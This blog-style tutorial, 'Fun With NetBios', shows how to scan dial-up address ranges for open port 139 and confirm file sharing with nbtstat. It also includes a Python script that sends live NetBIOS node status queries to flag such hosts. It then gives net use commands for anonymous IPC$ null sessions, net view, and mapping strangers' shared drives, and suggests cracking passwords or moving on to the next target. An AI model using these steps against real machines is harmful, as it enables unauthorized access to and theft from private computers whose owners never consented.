Fun With NetBios
I am by no means a computer hacker. I know quite a bit about networking and I am interested in security, but I really don't care much about hacking or script kiddies. I never use exploits for malicious purposes; I just like to learn more about networking and security. The best way to learn these things is by taking a hands-on approach. Anyone can read tutorials, fire off a bunch of scripts, and then call themselves l33t. I just like to take what I have learned about networking and try to learn more.
I was teaching my brother the basics of networking last Friday, and I hope he gains something from it. He was probably beginning to get bored with my tripe, so I decided to scan some ports using my trusty port scanner. I scanned a range of IP addresses that belonged to dial-up accounts, figuring that a lot of people still on dial-up might be using archaic hardware and operating systems. As it turned out, I was right. I saw a lot of PCs with port 139 (the NetBIOS session service) open, and once NetBIOS is reachable it is easy to get at shares. You would be surprised how many people have NetBIOS over TCP/IP enabled, how many have the IPC$ share available, how many share out entire drives without passwords, and how many are not using a firewall at all.
Finding A Target
Open up your preferred port scanner, such as nmap. Select a range of IP addresses, pick port 139, and let the results stack up. Once you find a computer with port 139 open, go to a command line and run nbtstat. This command displays NetBIOS over TCP/IP protocol statistics; with the -a switch (by NetBIOS name) or -A (by IP address) it lists the name table of the remote computer. Look for a <20> entry in the name table: that suffix belongs to the File Server service, so the machine is accepting SMB session requests and the IPC$ share is there to be used.
Here is an example:
nbtstat -a <computer name goes here>
nbtstat -A <IP address goes here>
The name table lists one line per registered name. If file sharing (and with it the IPC$ share) is enabled, you will see the computer name with the <20> suffix and the type column showing UNIQUE; the <00> entries for the workgroup name show as GROUP.
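What nbtstat -A does on the wire is a NetBIOS node status query (UDP/137, QTYPE NBSTAT) for the wildcard name "*", and the "name table" it prints is the list of 18-byte entries in the reply. The following Python script is an added example, not code from the original post: it builds that request, parses a reply into the same name/suffix/UNIQUE-or-GROUP table, and applies the article's check for a UNIQUE <20> entry. The host name "OLDBOX", the workgroup and the MAC address in the sample reply are constructed so the parser can run offline; pass an IP address on the command line to query a real host instead.

```python
import socket
import struct

# NBNS constants (RFC 1002): NBSTAT is the node status query type, class IN
NBSTAT_TYPE = 0x0021
IN_CLASS = 0x0001
NBNS_PORT = 137

# Common NetBIOS name suffixes; <20> is the one the article keys on
SUFFIXES = {
    0x00: "Workstation Service",
    0x03: "Messenger Service",
    0x20: "File Server Service",
    0x1B: "Domain Master Browser",
    0x1D: "Master Browser",
    0x1E: "Browser Service Elections",
}


def first_level_encode(raw16: bytes) -> bytes:
    """RFC 1001 14.1 first-level encoding: each nibble of the 16-byte name
    becomes one letter in 'A'..'P', wrapped as a single 32-byte label."""
    assert len(raw16) == 16
    out = bytearray()
    for b in raw16:
        out.append(0x41 + (b >> 4))
        out.append(0x41 + (b & 0x0F))
    return b"\x20" + bytes(out) + b"\x00"


def build_node_status_request(txid: int) -> bytes:
    """The datagram `nbtstat -A <ip>` sends: a query for the wildcard name
    '*' (followed by 15 NUL bytes, not spaces) with QTYPE NBSTAT."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    question = first_level_encode(b"*" + b"\x00" * 15)
    question += struct.pack(">HH", NBSTAT_TYPE, IN_CLASS)
    return header + question


def build_node_status_response(txid: int, names, mac: bytes) -> bytes:
    """Builds a reply the way a node answers; used here only to construct
    offline sample data. `names` is a list of (name, suffix, is_group)."""
    rdata = bytearray([len(names)])
    for name, suffix, is_group in names:
        entry = name.upper().encode("ascii").ljust(15, b" ")[:15] + bytes([suffix])
        flags = 0x0400 | (0x8000 if is_group else 0)  # ACT bit, plus G (group) bit
        rdata += entry + struct.pack(">H", flags)
    rdata += mac + b"\x00" * 40  # node statistics after the MAC, zeroed here
    header = struct.pack(">HHHHHH", txid, 0x8400, 0, 1, 0, 0)
    rr = first_level_encode(b"*" + b"\x00" * 15)
    rr += struct.pack(">HHIH", NBSTAT_TYPE, IN_CLASS, 0, len(rdata))
    return header + rr + bytes(rdata)


def parse_node_status_response(data: bytes) -> dict:
    """Parses the name table out of a node status response: the same
    data `nbtstat -a` prints. Returns txid, the names and the MAC."""
    txid, flags, qd, an, ns, ar = struct.unpack(">HHHHHH", data[:12])
    if not flags & 0x8000 or an < 1:
        raise ValueError("not a node status response")
    off = 12 + 34  # the answer RR carries the fixed 34-byte encoded name
    rtype, rclass, ttl, rdlen = struct.unpack(">HHIH", data[off:off + 10])
    if rtype != NBSTAT_TYPE:
        raise ValueError("unexpected RR type 0x%04x" % rtype)
    off += 10
    num = data[off]
    off += 1
    names = []
    for _ in range(num):
        entry = data[off:off + 18]
        nflags = struct.unpack(">H", entry[16:18])[0]
        names.append({
            "name": entry[:15].decode("ascii", "replace").rstrip(),
            "suffix": entry[15],
            "group": bool(nflags & 0x8000),   # G bit: GROUP vs UNIQUE
            "active": bool(nflags & 0x0400),  # ACT bit
            "service": SUFFIXES.get(entry[15], "unknown"),
        })
        off += 18
    mac = data[off:off + 6]
    return {"txid": txid, "names": names, "mac": ":".join("%02x" % b for b in mac)}


def file_server_running(table: dict) -> bool:
    """The article's check: a UNIQUE <20> entry means the File Server
    service is up, so the host accepts SMB sessions (including IPC$)."""
    return any(n["suffix"] == 0x20 and not n["group"] for n in table["names"])


def query_node_status(host: str, timeout: float = 3.0) -> dict:
    """Live version: send the request over UDP/137 and parse the reply."""
    txid = 0x1337
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_node_status_request(txid), (host, NBNS_PORT))
        data, _ = s.recvfrom(4096)
    table = parse_node_status_response(data)
    if table["txid"] != txid:
        raise ValueError("transaction id mismatch")
    return table


# Constructed sample reply: hypothetical workgroup host "OLDBOX" with file sharing on
SAMPLE_RESPONSE = build_node_status_response(
    0x1337,
    [("OLDBOX", 0x00, False), ("WORKGROUP", 0x00, True),
     ("OLDBOX", 0x20, False), ("WORKGROUP", 0x1E, True)],
    bytes.fromhex("00aabbccddee"),
)

if __name__ == "__main__":
    import sys
    table = query_node_status(sys.argv[1]) if len(sys.argv) > 1 else parse_node_status_response(SAMPLE_RESPONSE)
    for n in table["names"]:
        print("%-15s <%02X>  %-6s  %s" % (n["name"], n["suffix"], "GROUP" if n["group"] else "UNIQUE", n["service"]))
    print("MAC:", table["mac"], " file server:", file_server_running(table))
```

Run with no arguments to see the constructed table printed the way nbtstat lays it out; with an IP address it sends the real query, which needs UDP/137 to be reachable (a firewall that blocks it is exactly the case the article says is rare on these hosts).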
To connect to the IPC share, type net use \\computer-name\ipc$ at your command line. Without a username and password on that line Windows offers your own logon credentials; to try it as an anonymous null session instead, give an empty password and empty user: net use \\computer-name\ipc$ "" /user:"".
If it prompts for a password, either crack the password or move on to the next target. If you gain access to the IPC share, it will report: The command completed successfully.
Once the IPC$ connection is up, see what the machine shares out using the net view command:
net view \\computer-name (or the IP address)
Note that net view only lists visible shares; administrative shares whose names end in $ (such as C$ or ADMIN$) are hidden from the listing and need an administrator account anyway.
Select a share you want to use and type:
net use k: \\computer-name\sharename
If the share doesn't have a password, drive K: on your computer will now be mapped to their shared drive.
Now you can browse the contents of the share and do what you want to do!